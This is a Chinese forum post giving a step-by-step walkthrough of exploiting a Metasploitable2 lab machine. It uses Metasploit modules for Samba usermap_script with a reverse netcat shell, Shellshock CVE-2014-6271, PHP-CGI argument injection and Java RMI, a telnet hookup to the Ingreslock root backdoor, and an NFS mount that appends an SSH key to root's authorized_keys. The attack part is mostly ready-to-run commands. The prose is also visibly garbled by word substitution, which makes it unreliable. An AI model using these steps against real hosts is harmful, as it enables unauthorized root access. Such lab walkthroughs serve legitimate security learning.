立即登录 免费注册

漏洞利用六:Linux系统漏洞利用

闲聊 闲聊 1324 人阅读 | 0 人回复

<
筹办:间接用一个东西包,正在假造机上间接翻开Linux情况。此假造机为靶机。
150143tnqs1xngyqysf4yg.png

账号:msfadmin        暗码:msfadmin 
设权限sudo passwd root      改root暗码:msfadmin
切换权限:su root      输暗码:msfafmin
重启网卡:/etc/init.d/networking restart
xshell毗连地点:192.168.1.103(桥接)
  1、操纵samba 效劳破绽进侵linux主机(samba低版本),对应端心:139、445
靶机IP:192.168.1.103
查察当地效劳:netstat -lnt
分离nessus扫描本机的成果呈现的破绽,停止进犯。
进犯机:kali,IP:10.0.0.9
1.msfconsole
search samba
use exploit/multi/samba/usermap_script
set payload cmd/unix/reverse_netcat
show options
set rhosts 192.168.1.103
exploit
成功后可正在当地间接输进命令操控对圆。
  2、CVE-2014-6271       Bash Shellshock(破壳)
        Shellshock的道理是操纵了Bash正在导进情况变量函数时分的破绽,启动Bash的时分,它不单会导进那个函数,并且也会把函数界说前面的命令施行。正在有些CGI剧本的设想中,数据是经由过程情况变量去通报的,如许便给了数据供给者操纵Shellshock破绽的时机。简朴来讲便是因为效劳器的cgi剧本挪用了bash命令,因为bash版本太低,进犯者把有害数据写进情况变量,传到效劳器端,触收效劳器运转Bash剧本,完成进犯。cgi格局文件是“大众网闭接心剧本”规范文件。
1.筹办情况
靶机:metasploitable2(kali)体系,IP:192.168.1.103。
进犯机:kali,IP:10.0.0.9。
2.靶机上里
cd /usr/lib/cgi-bin/
(创立hello.sh文件:)
sudo nano hello.sh
(ctrl+x退出)(用vim对hello.sh剧本停止编纂:vim hello.sh)
#! /bin/bash
echo "Content-type: text/html"
echo ""
echo "Hello world!"
 (:wq保留)
(保留好后,付与剧本可施行权限,利用chmod命令:)
sudo chmod 755 hello.sh
(经由过程阅读器会见该剧本,能够看到成功施行,能够进犯)
http://192.168.1.103/cgi-bin/hello.sh
150144sffuk77la7llxfak.jpg

3.进进进犯机msfconsole。
search CVE-2014-6271
use exploit/multi/http/apache_mod_cgi_bash_env_exec
show options
150144loj2u3fla1j717oo.jpg

set rhost 192.168.1.103
set targeturi /cgi-bin/hello.sh
exploit 
150144gqqjmmdhmozdd7ij.png

  3、PHP CGI破绽
150144de58n5betkrv4br2.jpg

1.筹办情况
靶机:同上
进犯机kali,IP:10.0.0.9。
2.search cve:2012-1823
use exploit/multi/http/php_cgi_arg_injection
show options
set rhost 192.168.1.103
exploit
  4、Java RMI SERVER 命令施行破绽取java cve-2013-0422
nmap –p 0-65535 IP       #查察1099端心能否开启
use exploit/multi/misc/java_rmi_server
  5、Ingreslock  后门
道理:Ingreslock后门监听1524端心,毗连1524端心就能够间接提与root权限。
考证:正在当地机上   Telnet 192.168.1.103 1524
  6、NFS Exported Share Information Disclosure
rpcinfo -p 192.168.1.103                     #显现当地体系中注册到rpcbind和谈版本2的局部RPC效劳
150145euadyu17swjltbsl.jpg

showmount -e 192.168.1.103               #显现被挂载的同享目次
ssh-keygen                                            #天生稀钥
默许稀钥保留地点  (/root/.ssh/id_rsa.pub)     
mkdir /tmp/test                                      
mount -t nfs 192.168.1.103:/ /tmp/test
cat /root/.ssh/id_rsa.pub>>/tmp/test/root/.ssh/authorized_keys
ssh root@192.168.1.103
相称于长途毗连

免责声明:假如进犯了您的权益,请联络站少,我们会实时删除侵权内乱容,感谢协作!
1、本网站属于个人的非赢利性网站,转载的文章遵循原作者的版权声明,如果原文没有版权声明,按照目前互联网开放的原则,我们将在不通知作者的情况下,转载文章;如果原文明确注明“禁止转载”,我们一定不会转载。如果我们转载的文章不符合作者的版权声明或者作者不想让我们转载您的文章的话,请您发送邮箱:Cdnjson@163.com提供相关证明,我们将积极配合您!
2、本网站转载文章仅为传播更多信息之目的,凡在本网站出现的信息,均仅供参考。本网站将尽力确保所提供信息的准确性及可靠性,但不保证信息的正确性和完整性,且不对因信息的不正确或遗漏导致的任何损失或损害承担责任。
3、任何透过本网站网页而链接及得到的资讯、产品及服务,本网站概不负责,亦不负任何法律责任。
4、本网站所刊发、转载的文章,其版权均归原作者所有,如其他媒体、网站或个人从本网下载使用,请在转载有关文章时务必尊重该文章的著作权,保留本网注明的“稿件来源”,并自负版权等法律责任。
回复 关闭延时

使用道具 举报

謸氕づ独尊 LV2
发布了 14 篇主题 · 获得积分 156
 
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

关于作者
謸氕づ独尊 LV2
累计积分 156
发表主题数 14
热门标签
  • Archiver| 手机版| 小黑屋|
Powered by Discuz! X3.4 Copyright © 2001-2020, Tencent Cloud.( 鲁ICP备2023025969号-1 )|Sitemap